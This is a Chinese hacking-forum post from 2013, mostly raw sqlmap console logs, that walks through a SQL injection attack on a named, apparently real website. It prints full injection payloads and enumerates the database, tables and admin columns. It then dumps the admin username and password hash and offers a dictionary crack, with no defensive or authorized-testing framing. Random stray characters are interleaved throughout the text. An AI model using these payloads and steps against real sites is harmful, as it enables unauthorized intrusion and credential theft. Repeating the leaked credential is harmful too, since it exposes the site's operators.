找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2451|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db: o$ l+ b2 @" B, b' Z, S
ms "Mysql" --current-user       /*  注解:获取当前用户名称
4 X, p  J. T2 I0 w8 i    sqlmap/0.9 - automatic SQL injection and database takeover tool% U2 A5 Q% D* l1 r/ D9 i/ N, \3 W
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    9 S& I/ W+ T9 @& }! `[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    ; y4 b6 ~3 S+ H8 i- N% q session file+ @' H9 t2 ]# K2 t' G
    [16:53:54] [INFO] resuming injection data from session file  M6 ~, D5 u& l: W  l
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file2 A; g- x1 A) N2 O! y3 U
    [16:53:54] [INFO] testing connection to the target url' C" z; G* [$ [
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque2 Y6 a; M! n3 J
    sts:
    1 r( D3 {5 r2 t2 ^# v; ^! g6 P---; l7 ~; P7 ~5 p
    Place: GET/ G% O' t* i: e: m
    Parameter: id* C, T$ ~* B" N6 T4 s
        Type: boolean-based blind
    ( Z, m4 i; \6 G    Title: AND boolean-based blind - WHERE or HAVING clause
    # V+ k; _' f/ n    Payload: id=276 AND 799=799$ ~2 V" Y" ]* H1 e5 z4 n+ O1 g3 @
        Type: error-based# V: g3 q# [8 u* t( G0 ?6 {& O7 B
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    + k" ?" R7 @0 r3 J# w! H5 K+ k    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) C( J9 j5 A4 W6 d" }
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58/ m6 J" t# _/ q$ k5 o. h
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ! M# J' C. F7 R. m! A1 D    Type: UNION query
    1 I, T$ }& e1 Z    Title: MySQL UNION query (NULL) - 1 to 10 columns' F  X; ^' T3 t3 |+ o  _1 s
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ( u5 I1 J; @1 E(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),5 W4 k7 ^  J2 n( D/ a& ]
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#  I/ u* M& B8 @3 p
        Type: AND/OR time-based blind  e1 C5 a- F2 X9 ], S0 t
        Title: MySQL > 5.0.11 AND time-based blind
    - k  p8 ]  o  y9 x2 `; w# V' t" N    Payload: id=276 AND SLEEP(5)4 m' a: S2 B2 x4 g& k4 a
    ---* B7 K+ _2 j1 t1 F/ ?9 p6 {
    [16:53:55] [INFO] the back-end DBMS is MySQL) R+ R5 e% W$ m+ t$ l/ \
    web server operating system: Windows
      J& `" u5 Y, f( nweb application technology: Apache 2.2.11, PHP 5.3.0# P& A$ E7 M" _5 ]+ R
    back-end DBMS: MySQL 5.0
    6 y$ ^; H2 D% Z  r2 n( L& [- W[16:53:55] [INFO] fetching current user
    3 W8 K' a, k( i  Tcurrent user:    'root@localhost'   3 ^' G5 n+ D" P& J
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    1 R9 X) U. _1 J. n3 x7 atput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    2 L+ J* g+ W# O: x  O$ x, g. p3 K! u8 Y+ D5 A4 c+ q" f
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db& [% Z3 |; c+ |# L: g6 H4 k
    ms "Mysql" --current-db                  /*当前数据库+ e' J  D8 k2 j
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    2 b8 }2 [9 O+ G" D4 S" n    http://sqlmap.sourceforge.net
  • starting at: 16:54:16+ l# x6 J5 z1 l
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as/ }" ~' z) q" ~& C( E5 ~. C* ^' M
    session file
    / }( G' d% u  O; k% W6 s[16:54:16] [INFO] resuming injection data from session file
    . j! u+ J/ u" _4 z[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    + N! k2 Q  l- [/ ~( Z[16:54:16] [INFO] testing connection to the target url
    7 k% b  I9 J" A1 {sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 c) T% {* c& ]3 r* Z: C
    sts:+ S' K& Z4 @' i: D0 V
    ---  {* X4 q/ w. u
    Place: GET' B  S4 w2 b: A, Q
    Parameter: id
    3 E/ \2 m. ]  n8 F    Type: boolean-based blind* d% U1 |- w2 k! o/ D
        Title: AND boolean-based blind - WHERE or HAVING clause
    & \! ^+ N0 ^7 U: A- z  |: c4 b9 L' U    Payload: id=276 AND 799=799# K7 v$ ]9 O9 M! l4 r
        Type: error-based5 z5 X7 i4 {( {3 J  R* \0 ^
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    8 i; ~: S! O  Y7 P    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    0 j4 b5 N3 _# x' I$ z5 [7 t& {120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58  a5 k+ Q  S# U6 D! ?- K
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ; o$ t7 p8 K. G1 [  p5 A0 u    Type: UNION query
    1 R% N: j4 U" [3 a    Title: MySQL UNION query (NULL) - 1 to 10 columns
    ; {  m, U" B8 H# H8 ]4 }    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ! Q- M. q* \6 W+ E(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 q- u! b7 B$ ^3 V; A# |9 q* E
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ' r0 h9 p  w7 ]3 B( o    Type: AND/OR time-based blind
    & @+ E1 Z9 b# {% O    Title: MySQL > 5.0.11 AND time-based blind, E* ?, }, l( f3 C" f6 ]
        Payload: id=276 AND SLEEP(5)
    % l# W2 g5 a% ^; E4 S$ z5 q---8 F; s5 J# c; [% u0 G; ^! P
    [16:54:17] [INFO] the back-end DBMS is MySQL
    . O, ?2 }" h4 y4 Y0 U. Jweb server operating system: Windows5 j: Y' ^& M; O: j9 }/ \6 e3 w
    web application technology: Apache 2.2.11, PHP 5.3.01 _0 M; @; s: K8 r1 t; K
    back-end DBMS: MySQL 5.04 f8 g- [! R" D, [9 A
    [16:54:17] [INFO] fetching current database
    - v) @/ _' ]0 p9 K8 Ecurrent database:    'wepost'
    " ^" Q- w* A% Q' g5 f8 _4 b[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    $ l% y3 x. p, k; }1 ctput\www.wepost.com.hk'
  • shutting down at: 16:54:186 d* r1 Q3 M6 M7 v9 y/ d
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db7 A2 [7 X# ]6 r/ l2 L: k& d
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    3 H# w/ k  y: p5 |" H    sqlmap/0.9 - automatic SQL injection and database takeover tool
    6 X4 [. U. @* Y$ U0 o- h! i    http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    ; j% p/ ]1 u8 Z5 h+ V0 m* `[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    ( p, b% P8 @# W! q+ s. E( E* O session file
    . Z8 c' O3 w6 W5 X2 T[16:55:25] [INFO] resuming injection data from session file' L3 y8 \+ u: V" r: A3 |4 q6 C
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file! A$ a0 K3 \: g& a$ |' w
    [16:55:25] [INFO] testing connection to the target url. Z" M) z# U9 o. z) J
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 }* W  c4 w) F9 B4 T: |0 k. t0 x
    sts:
    $ ^$ c% ?2 _& S8 D- a  _; s---
    1 p6 g2 V. K3 o* \4 l$ L8 ^Place: GET
    5 I5 P2 C  \* W0 |% x0 Y% P1 nParameter: id
    3 H! R( B3 p8 [+ h, O    Type: boolean-based blind
    + M( U& i0 e: W  z5 v  m    Title: AND boolean-based blind - WHERE or HAVING clause
    $ f9 j. ]2 T9 x( m/ }8 e! q' E    Payload: id=276 AND 799=799
    5 P; n0 O. ~+ M    Type: error-based
    6 @- R1 S( o9 q    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) ]2 \; k8 r: u* ^
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    : j# v4 t- ]9 {) E4 o120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,582 Z1 Z- q, O1 c4 n
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)3 Y9 ~7 S, E+ ], M4 A8 x) e/ Q% H
        Type: UNION query; u) e2 ]+ J4 G3 h# t6 N2 Y
        Title: MySQL UNION query (NULL) - 1 to 10 columns- h! C, e- P2 \) O1 c
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( ~. U- T' V; W$ Y3 K
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    - x& V: {5 k4 h: I3 e% pCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    1 p( y( K" }. L: g9 b0 E    Type: AND/OR time-based blind# i/ {' J, c: o% c6 o# ~- \  _
        Title: MySQL > 5.0.11 AND time-based blind4 `  \5 n$ d! W8 @5 y0 `. v# \1 p
        Payload: id=276 AND SLEEP(5)) z# n- d, F/ Z4 x6 U) z
    ---
    0 K% S/ Q5 E- I' c[16:55:26] [INFO] the back-end DBMS is MySQL
    / \. X: H8 ]6 F. kweb server operating system: Windows3 f9 x3 a' B' x8 X
    web application technology: Apache 2.2.11, PHP 5.3.0: a  m! @- l. |9 u- O
    back-end DBMS: MySQL 5.04 R# ?% ]# V' `* s' X3 p( \
    [16:55:26] [INFO] fetching tables for database 'wepost'+ p- g" E4 ~2 e+ `9 j1 M
    [16:55:27] [INFO] the SQL query used returns 6 entries7 ]4 e2 k& A/ s
    Database: wepost; H! f+ b6 Q/ H# O& H7 D! n* ]
    [6 tables]
    1 b1 K- q! j9 x- }8 U+-------------+. _0 K# j5 P' i; i$ P' J: V, I
    | admin       |
    + P" a$ o$ m4 t+ h7 u7 g* K| article     |) x, e8 o0 k4 W2 j8 \
    | contributor |$ l2 F: O" t$ l1 [
    | idea        |' u* f# h2 c5 B4 w+ d
    | image       |
    % g) C, o" Q* M( O| issue       |3 e  i* `; y! E$ s
    +-------------+* i0 u: f5 a5 W( m( V' ^
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou' ?$ M) C' U& X: P5 X& z
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33% X! s& t: y1 v! t2 Y' |

    " x  ~1 V2 `- g" o+ ?D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 w, G7 }* J- _% h. z4 k8 w
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    9 {, V( h; J6 _* O; r% h& q; C    sqlmap/0.9 - automatic SQL injection and database takeover tool2 K0 _8 F4 G/ B# H* h& v: t9 z9 a
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06' W9 C, ]" X) V/ T& E# I
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    : Q  Q/ ?7 w4 c9 e/ e( gsts:
    * D9 y( C2 Y3 |7 C+ i---
    & k% L  F" H% `6 h) `( O7 H  \4 NPlace: GET( \1 }) g/ K- s  F
    Parameter: id6 z; t5 l5 c( j' L5 F
        Type: boolean-based blind
    4 A+ D% y8 [, F# m$ s% w    Title: AND boolean-based blind - WHERE or HAVING clause' Y9 L5 \8 ]4 f3 |7 Z
        Payload: id=276 AND 799=799$ k( u8 A  M; [- A1 B3 p3 G$ _4 O; K/ p
        Type: error-based
    : |, p" L2 ]% o2 J( z8 ~0 }    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause# ?* p/ W& j2 y0 c8 |& P2 Y
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
      Z9 B  w% g7 A) w4 S, ^+ U/ m120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ) B# G% R- F& U3 e  [: e/ v% ?),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    9 j6 V: u2 {! {, m4 J0 @    Type: UNION query* r+ e, g& @. {7 T4 `, f+ w
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    . \2 n: [+ j2 c' a2 ^1 P' [. k    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    1 L0 l# K. b- C) a(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    4 D" k* J3 A# \8 GCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#/ }" u6 f# w+ }7 y
        Type: AND/OR time-based blind/ G/ _! {+ v0 ^/ v7 x5 l& N
        Title: MySQL > 5.0.11 AND time-based blind
    + X  F! U7 \( w    Payload: id=276 AND SLEEP(5)! W5 A3 h# k7 ]4 I- `7 M" d: H
    ---
    : c* R4 p. l6 o8 B3 l- Wweb server operating system: Windows7 C$ ]7 j8 ~+ e' P9 e
    web application technology: Apache 2.2.11, PHP 5.3.0% N6 f3 `5 g" d, X8 ^5 e3 g/ M8 e' c2 w
    back-end DBMS: MySQL 5.08 ^$ x3 S$ ?8 V) W1 Z0 Y/ B
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se1 T/ T  }; L- Q% ?- Z3 g9 l& k; S
    ssion': wepost, wepost0 f) H% m" x1 i
    Database: wepost( M% G6 `6 h0 y/ K; }, K  a
    Table: admin
    / u0 r  a1 Q+ r, q4 |[4 columns]
    ; |* Z( [9 H" }+----------+-------------+1 n& ], t" O' r! }
    | Column   | Type        |
    7 B$ C* X# J* `0 |7 `+----------+-------------+& J4 m) y5 h' R3 n
    | id       | int(11)     |
    3 J8 s& F3 r, f5 x5 z- z| password | varchar(32) |
    , }: Y4 i. k1 S4 X( Q* `. N$ w+ b| type     | varchar(10) |; a4 x, ], R+ R* e- X3 t4 Y
    | userid   | varchar(20) |& i* T$ A+ h/ [6 p. S/ d* J/ @& M0 T
    +----------+-------------+
    / j* m, l% E; ]; f, {& P3 r
  • shutting down at: 16:56:19
    * P8 y9 n  A9 Y1 W' {" b' z1 o) Y2 d# h8 k$ T
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    * R( j8 Z* ]# u- Q4 Ums "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容  k7 e: C: \( `7 q0 w1 F6 Q, k* v
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    + ^- g9 k5 m9 ?; c3 H    http://sqlmap.sourceforge.net
  • starting at: 16:57:14, y- o* X4 y  e8 l. o0 L
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque, _4 d- _, y. S" C4 u4 c. F
    sts:
    ' {0 _. r4 ]  |0 ^---
    : I7 K" O$ P8 m( L& k+ u5 s' _Place: GET
    " q! N$ y, [. U+ {1 ~- t; ]Parameter: id
    3 N: l, _% j  n2 H& b+ G9 E    Type: boolean-based blind. j4 F  j0 Y! w( A2 G# [, A( A/ G
        Title: AND boolean-based blind - WHERE or HAVING clause9 S% E% }4 T! b/ d# g6 L4 z% {
        Payload: id=276 AND 799=7998 g4 ?7 s6 [* F5 L* c" d/ K
        Type: error-based' Y$ J3 e( C! V! p5 z4 R* t( V
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* _( n! a' @2 ?( j
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    # T4 w% @' O# B% a120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ) @0 s% p+ s3 O) ~, x4 @),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 h$ @4 f; P0 i$ m9 h, c9 F
        Type: UNION query3 A7 j1 e8 [4 K2 [2 J, Q
        Title: MySQL UNION query (NULL) - 1 to 10 columns8 ~+ [+ o8 C- Z5 R, d" w8 L4 _7 L
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    3 P" ~% }3 p/ ~7 G(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),, n; t3 ]' w5 p1 d) j. {  o! X9 h
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    5 Q; K+ `! `$ F4 l0 l0 A    Type: AND/OR time-based blind
      t2 I/ S3 W  I, h0 H2 l5 P    Title: MySQL > 5.0.11 AND time-based blind3 s; J" l1 C5 T+ I) |7 H0 O$ v
        Payload: id=276 AND SLEEP(5)
    9 U- ~3 [, H. E1 n0 l7 x2 d---
    # E: [& O; z1 G& e/ H7 b, N# R  Kweb server operating system: Windows
    # I; }, W0 X2 {' S6 Lweb application technology: Apache 2.2.11, PHP 5.3.0. G- |/ V0 p3 x  a3 _& p
    back-end DBMS: MySQL 5.0/ b$ V0 l- G9 P) a! c1 v
    recognized possible password hash values. do you want to use dictionary attack o0 D2 [0 z6 G- x7 Y7 V
    n retrieved table items? [Y/n/q] y
    . i0 w( `4 c' swhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]" U' @8 y) z/ ^5 f" E% U' V4 H
    do you want to use common password suffixes? (slow!) [y/N] y+ t0 |' Z, ]) D0 o' ]
    Database: wepost5 f0 @# O7 x. p5 f+ |
    Table: admin* y$ p6 {: U: q; z2 u4 ]; G/ z# t+ N
    [1 entry], v( [) e; J( L, R; ]" S
    +----------------------------------+------------+
    ) i( `9 s! E: @5 s  L. N: h| password                         | userid     |
    ' e. C  h$ T  p% r; u7 r( C+----------------------------------+------------+
    : Z/ P4 q* w( ^( ^& A/ }- L7 L| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |$ {5 F7 p/ i, b/ v6 P  [" d) l3 B8 d
    +----------------------------------+------------+' ~, o0 \& N" k. V: d
  • shutting down at: 16:58:14
    6 Y- X7 L3 W0 [% t2 P9 s
    3 u( k4 }3 q! }2 o2 q* W  ?D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表